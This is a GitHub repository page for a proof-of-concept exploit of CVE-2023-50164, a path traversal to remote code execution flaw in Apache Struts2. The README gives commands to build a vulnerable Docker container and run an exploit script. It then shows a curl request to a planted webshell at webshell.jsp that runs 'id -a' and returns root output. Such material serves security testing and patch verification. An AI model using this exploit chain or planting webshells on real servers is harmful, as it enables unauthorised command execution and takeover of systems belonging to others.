Skip to content

CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept

Notifications You must be signed in to change notification settings

sunnyvale-it/CVE-2023-50164-PoC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept

This PoC has been made to test an RCE (Remote Code Execution) by exploiting the Apache Struts2 vulnerability.

Build the image and run a container:

$ DOCKER_BUILDKIT=1 docker build  . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc

Run the exploit:

$ cd exploit
$ ./exploit.sh

Now you can executy arbitrary commands on server side as showed:

$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a  

uid=0(root) gid=0(root) groups=0(root)

Credits

About

CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published